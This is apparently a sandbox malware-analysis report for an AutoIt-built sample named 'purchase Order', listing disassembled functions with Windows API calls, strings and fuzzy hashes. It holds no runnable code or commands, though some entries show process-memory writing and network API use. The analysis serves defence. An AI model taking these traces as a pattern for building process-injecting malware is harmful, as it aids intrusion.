Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 5ea4b4d7ec39bfdf3190fb1e1d044088446a1226e68009ac08a27b6dd7d9abc0
Instruction ID: 91450839daaced52eae1f09c549bc2fcad5aa1a3933546d779d7e5a0fa7a6369
Opcode Fuzzy Hash: 5ea4b4d7ec39bfdf3190fb1e1d044088446a1226e68009ac08a27b6dd7d9abc0
Instruction Fuzzy Hash: 15914774600601AFDB64CF64C884F6ABBF9BF48710F24846EF95ACB291DB71E941CB60

Function 00C5BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00C5BCDA
GlobalMemoryStatusEx.KERNEL32 ref: 00C5BCF3

Strings

@, xrefs: 00C5BCE8

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 107b1d9938507f8ca51f3c500433e57ab07b68a5524d01275bc4bac8d5819175
Instruction ID: ca5759ea232bbef5d13761f0b2203566b2ad347310d7404010d089d9a04bdb4e
Opcode Fuzzy Hash: 107b1d9938507f8ca51f3c500433e57ab07b68a5524d01275bc4bac8d5819175
Instruction Fuzzy Hash: C75154714087449BE320AF14DC86BAFBBE8FF95355F41484EF5C8811A2DB7088ACD75A

Function 00C8C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00C444ED: __fread_nolock.LIBCMT ref: 00C4450B

_wcscmp.LIBCMT ref: 00C8C65D
_wcscmp.LIBCMT ref: 00C8C670

Strings

FILE, xrefs: 00C8C5A5

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: ac9ad0085d7d6aed8367d147374fc7d060dabb5705251696448106884f98c5e5
Instruction ID: 013931cca14063288c397a3d1ed3937275654c7f97f09c464859d92b5a91e153
Opcode Fuzzy Hash: ac9ad0085d7d6aed8367d147374fc7d060dabb5705251696448106884f98c5e5
Instruction Fuzzy Hash: D541F372A0020ABBDF20AAA4CC82FEF77B9EF49714F104079F601EB181D6719A04DB65

Function 00CAA76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00CAA85A
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CAA86F

Strings

', xrefs: 00CAA7C3

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 7916a7819c789dc7ba51fa531bd2e322821e0d8e308c0f2390f2ae6922124d27
Instruction ID: e9cb05bd1b3c97ac39f4cbb2a50c8ae428ff9993f093e8029ad7175a229c3a20
Opcode Fuzzy Hash: 7916a7819c789dc7ba51fa531bd2e322821e0d8e308c0f2390f2ae6922124d27
Instruction Fuzzy Hash: E4410874E0130A9FDB54CF69C880BDA7BB9FB09304F10006AE919EB381D775A941CFA1

Function 00C95180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C95190
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00C951C6

Strings

|, xrefs: 00C951B5

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 65bd4fd3102296f6187d8fa72dca33829709cc5593af361283adc7553bca7cd7
Instruction ID: 45c02f676302038b297958bdb4360f952aebc43f88540b1b59280ce1a1c2a7f8
Opcode Fuzzy Hash: 65bd4fd3102296f6187d8fa72dca33829709cc5593af361283adc7553bca7cd7
Instruction Fuzzy Hash: 28315771C01119AFCF51EFA4CC85AEEBFB9FF18700F100059F915A6166EB71AA06DBA0

Function 00CA975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00CA980E
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00CA984A

Strings

static, xrefs: 00CA97AA

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: e86af8f043f529d149d038c4764aab80290606a2608697fa29123b9ee275a9f5
Instruction ID: c3acc0769fa3f7902e611af6d927f294b5c81ced54ee578a4234f20668385466
Opcode Fuzzy Hash: e86af8f043f529d149d038c4764aab80290606a2608697fa29123b9ee275a9f5
Instruction Fuzzy Hash: FE31BC71100205AAEB109F78CC81BFB77B9FF5A768F108619F9AAC7190CA34AC81D760

Function 00C7C2DE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00C7C2F7
SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C7C331

Strings

@U=u, xrefs: 00C7C2F7, 00C7C331

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: ed9db9b23fcb70bbbf7d107ec162b5aba723cdee0fef5cb2188474d647a4b16f
Instruction ID: 4f76f8d9e1e0e7a1665a9d2afed916f205337c09aeaf8bd49309b39ac1e962a8
Opcode Fuzzy Hash: ed9db9b23fcb70bbbf7d107ec162b5aba723cdee0fef5cb2188474d647a4b16f
Instruction Fuzzy Hash: 9F21B972D00216ABCB11AF54D8C1DFEB7B9FF88700B11C12DF919A72A0EA709D42D760

Function 00C85157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C851C6
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C85201

Strings

0, xrefs: 00C851BF

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: c874879c02dbd5481024bbf13745158d0270b2f46e9d22ba3beb97e7db9264aa
Instruction ID: 79a9b56e54142757c257dec998cc855879fac6e667a7687c8b9c67435cae2087
Opcode Fuzzy Hash: c874879c02dbd5481024bbf13745158d0270b2f46e9d22ba3beb97e7db9264aa
Instruction Fuzzy Hash: 7B312531600304ABEB24EF89C844B9EBBF4BF41358F14002DE9A1A61A0DBF09B44CB14

Function 00C9658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00C96608

Strings

, $, xrefs: 00C96648
AUTOITCALLVARIABLE%d, xrefs: 00C965FA

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: __snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 2391506597-2584243854
Opcode ID: 7b793bc3d410a2794a2775198e17b92f4f8cb707a942b5d2babeffe74994f9ef
Instruction ID: 22528f8942489cd0c4827557e7c4b4be017f2346ceedaa6489f372e20b9f6bdc
Opcode Fuzzy Hash: 7b793bc3d410a2794a2775198e17b92f4f8cb707a942b5d2babeffe74994f9ef
Instruction Fuzzy Hash: 58216D71A00218BFCF14EFA4C886EEE77B4BF45740F004469F505AB296DB70EA45DBA6

Function 00CA955E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C87DB1: GetLocalTime.KERNEL32 ref: 00C87DBE
Part of subcall function 00C87DB1: _wcsncpy.LIBCMT ref: 00C87DF3
Part of subcall function 00C87DB1: _wcsncpy.LIBCMT ref: 00C87E25
Part of subcall function 00C87DB1: _wcsncpy.LIBCMT ref: 00C87E58
Part of subcall function 00C87DB1: _wcsncpy.LIBCMT ref: 00C87E9A

SendMessageW.USER32(?,00001002,00000000,?), ref: 00CA95F8

Strings

@U=u, xrefs: 00CA95F8
SysDateTimePick32, xrefs: 00CA95B6

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: _wcsncpy$LocalMessageSendTime
String ID: @U=u$SysDateTimePick32
API String ID: 2466184910-2530228043
Opcode ID: 0c2a7f14c744008d99c9bb2ec20412956f083e447b05412b65e491df5ced6750
Instruction ID: cef755264abd907f7c24fa4bd03a97313f42056a0f61f88c9eab9e4351d4c1b2
Opcode Fuzzy Hash: 0c2a7f14c744008d99c9bb2ec20412956f083e447b05412b65e491df5ced6750
Instruction Fuzzy Hash: 8321E1726402096FEF229E54CC83FEE336AEB45768F104A19F951AB2D0D6B1ED4197A0

Function 00C7BB97 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C7BBB0

Part of subcall function 00C8422F: GetWindowThreadProcessId.USER32(?,?), ref: 00C8425A
Part of subcall function 00C8422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C7BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00C8426A
Part of subcall function 00C8422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C7BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00C84280

Part of subcall function 00C8430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C7BC08,?,?,00000034,00000800,?,00000034), ref: 00C84335

SendMessageW.USER32(?,00001073,00000000,?), ref: 00C7BC17

Part of subcall function 00C842D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C7BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00C84300

Strings

@U=u, xrefs: 00C7BBB0, 00C7BC17

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
String ID: @U=u
API String ID: 1045663743-2594219639
Opcode ID: d537414f0eb2bd9480f2016844eeba33f4a58e33872ee5d7921dd161e61285f1
Instruction ID: 53dffcc21ac7852115e1f1e1d6de968991f8faeea9f9be227bd1e5b262b04e99
Opcode Fuzzy Hash: d537414f0eb2bd9480f2016844eeba33f4a58e33872ee5d7921dd161e61285f1
Instruction Fuzzy Hash: 69216D31901129ABEF25ABA8DC81FDEBBB8FF04354F1041A5F559A7190EA705E44DBA0

Function 00CA93CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CA945C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CA9467

Strings

Combobox, xrefs: 00CA9429

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 395fad7c8d7d26262bdf9d8b8c50460e3908ad6bef28ba5a5def16a3ba259243
Instruction ID: e407afe958ee70094cd0b5909aa61ed751c69263f6a78af83fdc5340ea972ddc
Opcode Fuzzy Hash: 395fad7c8d7d26262bdf9d8b8c50460e3908ad6bef28ba5a5def16a3ba259243
Instruction Fuzzy Hash: CE11B27130020A6FEF21DE54DC81FBB376EEB893A8F100125F929972A0D6319D529B60

Function 00CAC3DE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

@U=u, xrefs: 00CAC45F, 00CAC488

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID:
String ID: @U=u
API String ID: 0-2594219639
Opcode ID: d2078aa7fcdf03abe285e878256b822f6f4174820e4e3a7fb4ae39de1e9c84b2
Instruction ID: dea1cdab5dbb8ca32acf4defb551a055304eb9ed41da819b0a1216ceb73bc903
Opcode Fuzzy Hash: d2078aa7fcdf03abe285e878256b822f6f4174820e4e3a7fb4ae39de1e9c84b2
Instruction Fuzzy Hash: 8911E63510021AFFEF108FA4CCA5FB93764EB0E308F008115FA66DA1D0D270DA10EB68

Function 00C7D4F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C4103B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C41052

SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C7D54E
_strlen.LIBCMT ref: 00C7D559

Strings

@U=u, xrefs: 00C7D54E

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend$Timeout_strlen
String ID: @U=u
API String ID: 2777139624-2594219639
Opcode ID: ddef75ff7839a9ea6fbce61430ef95075ce10ce665bb02ee5a788224c60f1495
Instruction ID: bbc8c39b4bca7a1ec8197436e3387e9f03e5288592e5c2c8994d3858ecab2c74
Opcode Fuzzy Hash: ddef75ff7839a9ea6fbce61430ef95075ce10ce665bb02ee5a788224c60f1495
Instruction Fuzzy Hash: 5211A371200105A7CB44AE69DCC29AE7BB8AF55344F008439FA0B9B192DE60DD86A7A0

Function 00CA98FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00C5D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C5D1BA
Part of subcall function 00C5D17C: GetStockObject.GDI32(00000011), ref: 00C5D1CE
Part of subcall function 00C5D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C5D1D8

GetWindowRect.USER32(00000000,?), ref: 00CA9968
GetSysColor.USER32(00000012), ref: 00CA9982

Strings

static, xrefs: 00CA9945

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 89c36fc8fda179bfa5dddbe935e32e4ae9f4c1020dbdcc8bae1b35a19c564887
Instruction ID: dda447b849e32fd57ba532412c57b9874b9dc67937f6a132028cb3c08cb38963
Opcode Fuzzy Hash: 89c36fc8fda179bfa5dddbe935e32e4ae9f4c1020dbdcc8bae1b35a19c564887
Instruction Fuzzy Hash: 8F11297251020AAFDB14DFB8CC46EEE7BA8FB09358F054628F956D2250D735E851DB60

Function 00C85262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C852D5
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00C852F4

Strings

0, xrefs: 00C852CE

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: acdef80bf655af7f9f16c5bed6f3a87bedaf3db1c8fdaa7b6be8c9e41d044b9f
Instruction ID: 3feb6bcffb92fb9dcaf0b96002169575a9020159442ee0f87300b5b683d96ff1
Opcode Fuzzy Hash: acdef80bf655af7f9f16c5bed6f3a87bedaf3db1c8fdaa7b6be8c9e41d044b9f
Instruction Fuzzy Hash: FC112F76D00B14EBDB20EB98C840B9D77B8AB05398F040021E826E72A0D7F0EF04CBA5

Function 00C94D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C94DF5
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C94E1E

Strings

<local>, xrefs: 00C94DE6

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 943b9f721eb28465c81c977e9aa4a1e57a62212619f4e30bf04b76f7c04a3184
Instruction ID: 3335daaf7aba958f807eca4824b7616944d33587afa21f7d22879c1dbeb1929e
Opcode Fuzzy Hash: 943b9f721eb28465c81c977e9aa4a1e57a62212619f4e30bf04b76f7c04a3184
Instruction Fuzzy Hash: EC119A75501221BBDF298B62C88CFFBFAA8FB06755F10822AF52596140D3709A52C6E0

Function 00CAB1DE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 00CAB22B

Strings

@U=u, xrefs: 00CAB22B, 00CAB267

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: f0353b79f65bd6d74f9d17c63b527888fe2b71a8536bcde101f9e97b65f4d22f
Instruction ID: 4cac14e0079c21c8bd2628022a8f3ec558f3f1b64c7b71e9722c6b51b9f83b43
Opcode Fuzzy Hash: f0353b79f65bd6d74f9d17c63b527888fe2b71a8536bcde101f9e97b65f4d22f
Instruction Fuzzy Hash: 3D21C07960020AEFCB15DF98C850AAE7BB9FB4E344B004655F916A3361D731AE61DBA0

Function 00CA92B1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000401,?,00000000), ref: 00CA9327

Strings

@U=u, xrefs: 00CA9327
button, xrefs: 00CA92FE

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

